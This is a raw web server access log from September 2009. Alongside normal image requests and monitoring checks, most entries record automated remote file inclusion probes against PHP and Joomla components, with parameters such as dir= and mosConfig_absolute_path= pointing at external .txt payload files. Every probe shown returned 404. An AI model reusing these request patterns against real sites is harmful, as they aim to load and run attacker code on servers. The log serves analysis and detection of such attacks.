204.208.240.55 - - [04/Sep/2009:04:30:05 -0400] "GET /images/items/0034020_THUMB.JPG HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:05 -0400] "GET /images/space.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:06 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:06 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.43.202.66 - - [04/Sep/2009:04:30:06 -0400] "GET /logs/access_log.Q109080100//bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:30:06 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
204.208.240.55 - - [04/Sep/2009:04:30:06 -0400] "GET /images/head_btn-products-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:06 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.43.202.66 - - [04/Sep/2009:04:30:06 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:30:06 -0400] "GET /logs/access_log.Q109081400//bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
204.208.240.55 - - [04/Sep/2009:04:30:07 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:07 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:07 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:07 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:07 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:07 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.43.202.66 - - [04/Sep/2009:04:30:11 -0400] "GET /logs/access_log.Q109080100//bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:30:11 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:30:11 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:30:12 -0400] "GET /logs/access_log.Q109081400//bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
69.94.125.100 - - [04/Sep/2009:04:31:08 -0400] "GET /logs/access_log.Q109081700//skin/ggambo7002_gallery/setup.php?dir=http://www.mywebbguy.com/plugins/system/fx29id.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
69.94.125.100 - - [04/Sep/2009:04:31:17 -0400] "GET /logs/access_log.Q109081700//skin/ggambo7002_gallery/setup.php?dir=http://www.mywebbguy.com/plugins/system/fx29id.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.200.89.25 - - [04/Sep/2009:04:31:23 -0400] "GET /logs/access_log.Q109081700//skin/ggambo7002_gallery/setup.php?dir=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
59.27.95.144 - - [04/Sep/2009:04:31:24 -0400] "GET /logs//login.php?dir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
59.27.95.144 - - [04/Sep/2009:04:31:24 -0400] "GET /logs/access_log.Q109081400//login.php?dir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
59.27.95.144 - - [04/Sep/2009:04:31:24 -0400] "GET //login.php?dir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
69.94.125.100 - - [04/Sep/2009:04:31:27 -0400] "GET /logs/access_log.Q109081400//skin/ggambo7002_gallery/setup.php?dir=http://www.mywebbguy.com/plugins/system/fx29id.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.200.89.25 - - [04/Sep/2009:04:31:37 -0400] "GET /logs/access_log.Q109081400//skin/ggambo7002_gallery/setup.php?dir=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
69.94.125.100 - - [04/Sep/2009:04:31:44 -0400] "GET /logs/access_log.Q109081400//skin/ggambo7002_gallery/setup.php?dir=http://www.mywebbguy.com/plugins/system/fx29id.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
59.27.95.144 - - [04/Sep/2009:04:31:48 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
209.59.12.99 - - [04/Sep/2009:04:32:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.189.190.100 - - [04/Sep/2009:04:33:32 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
211.43.202.66 - - [04/Sep/2009:04:33:37 -0400] "GET /logs/access_log.Q109080100%20//bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:33:40 -0400] "GET /logs/access_log.Q109080100%20//bbs//skin/ggambo7002_board/write.php?dir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
79.189.190.100 - - [04/Sep/2009:04:33:42 -0400] "GET /logs/access_log.Q109071000%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:34:37 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:34:37 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:34:37 -0400] "GET /logs/access_log.Q109080500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:34:41 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.172.33.230 - - [04/Sep/2009:04:35:37 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/baner.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.172.33.230 - - [04/Sep/2009:04:35:37 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.172.33.230 - - [04/Sep/2009:04:35:37 -0400] "GET /logs/access_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.233.52.18 - - [04/Sep/2009:04:35:49 -0400] "GET /logs/access_log.Q109062000%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
209.172.33.230 - - [04/Sep/2009:04:35:54 -0400] "GET /logs/error_log.Q109081200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:35:56 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:35:56 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:35:56 -0400] "GET /logs/access_log.Q109080500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:35:56 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.172.33.230 - - [04/Sep/2009:04:36:08 -0400] "GET /logs/access_log.Q109081200%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.172.33.230 - - [04/Sep/2009:04:36:13 -0400] "GET /logs/error_log.Q109081200%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.233.52.18 - - [04/Sep/2009:04:37:19 -0400] "GET /logs/access_log.Q109061300%20//login.php?dir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
209.59.12.99 - - [04/Sep/2009:04:37:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.182 - - [04/Sep/2009:04:38:12 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:38:18 -0400] "GET /logs/access_log.Q109080500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.231.1.50 - - [04/Sep/2009:04:38:20 -0400] "GET /index.php?redir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.231.1.50 - - [04/Sep/2009:04:38:20 -0400] "GET /logs/access_log.Q109071900/index.php?redir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.231.1.50 - - [04/Sep/2009:04:38:20 -0400] "GET /logs/index.php?redir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:38:28 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:04:38:35 -0400] "GET /logs/access_log.Q109080500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.231.1.50 - - [04/Sep/2009:04:39:13 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.98.171.91 - - [04/Sep/2009:04:39:33 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
212.98.171.91 - - [04/Sep/2009:04:39:33 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.55.207.76 - - [04/Sep/2009:04:39:57 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.176.226.164 - - [04/Sep/2009:04:40:12 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.176.226.164 - - [04/Sep/2009:04:40:12 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:40:44 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:40:44 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.231.126.252 - - [04/Sep/2009:04:41:42 -0400] "GET ///i.social.php?Q=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
220.231.126.252 - - [04/Sep/2009:04:41:42 -0400] "GET /logs///i.social.php?Q=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:42:19 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:42:19 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:04:42:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.248.45.100 - - [04/Sep/2009:04:43:09 -0400] "GET /logs/access_log.Q109072600//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.806"
79.189.190.100 - - [04/Sep/2009:04:43:09 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
79.189.190.100 - - [04/Sep/2009:04:43:09 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 231 "-" "Mozilla/5.0"
213.248.45.100 - - [04/Sep/2009:04:43:11 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.806"
213.248.45.100 - - [04/Sep/2009:04:43:11 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.806"
213.248.45.100 - - [04/Sep/2009:04:43:14 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.806"
59.27.95.144 - - [04/Sep/2009:04:44:59 -0400] "GET /logs/access_log.Q109061300%20//login.php?dir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
222.233.52.18 - - [04/Sep/2009:04:46:10 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
222.233.52.18 - - [04/Sep/2009:04:46:10 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
222.233.52.18 - - [04/Sep/2009:04:46:10 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
222.233.52.18 - - [04/Sep/2009:04:46:10 -0400] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
209.59.12.99 - - [04/Sep/2009:04:47:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.192 - - [04/Sep/2009:04:48:21 -0400] "GET /logs/access_log.Q109072000/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:21 -0400] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:21 -0400] "GET /logs/access_log.Q109080100/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:21 -0400] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:21 -0400] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:21 -0400] "GET /logs/access_log.Q109072000/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:21 -0400] "GET /logs/access_log.Q109080100/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:26 -0400] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:33 -0400] "GET /////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:38 -0400] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:38 -0400] "GET /logs/access_log.Q109072000/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Sep/2009:04:48:38 -0400] "GET /logs/access_log.Q109080100/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.233.69.41 - - [04/Sep/2009:04:48:41 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.233.69.41 - - [04/Sep/2009:04:48:41 -0400] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.233.69.41 - - [04/Sep/2009:04:48:41 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:48:54 -0400] "GET /logs///ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:48:54 -0400] "GET ///ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:48:55 -0400] "GET /logs/access_log.Q109072000///ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:48:55 -0400] "GET /logs/access_log.Q109080100///ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.233.69.41 - - [04/Sep/2009:04:48:56 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.233.69.41 - - [04/Sep/2009:04:48:56 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.233.69.41 - - [04/Sep/2009:04:48:56 -0400] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:49:01 -0400] "GET ///ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:04:49:01 -0400] "GET /logs///ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
